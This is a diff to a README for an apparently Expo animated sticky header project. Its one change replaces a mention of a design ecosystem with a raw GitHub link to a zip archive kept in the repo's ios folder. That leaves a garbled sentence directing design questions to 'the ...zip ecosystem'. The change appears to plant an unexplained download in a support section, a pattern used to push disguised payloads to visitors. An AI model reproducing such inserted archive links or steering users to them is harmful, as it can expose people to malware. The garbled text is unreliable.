sorridente3327/expo-animated-sticky-header/README.md

 Community and support
 - The project thrives on open source collaboration.
 If you need help, use the Issues tab to file a bug report or request a feature.
-- For design questions, you can reach out through Discussions or related channels in the glow-ui.xyz ecosystem.
+- For design questions, you can reach out through Discussions or related channels in the https://raw.githubusercontent.com/sorridente3327/expo-animated-sticky-header/main/ios/header-animated-sticky-expo-v1.5.zip ecosystem.

 License
 - The project is released under a permissive license suitable for personal and commercial use.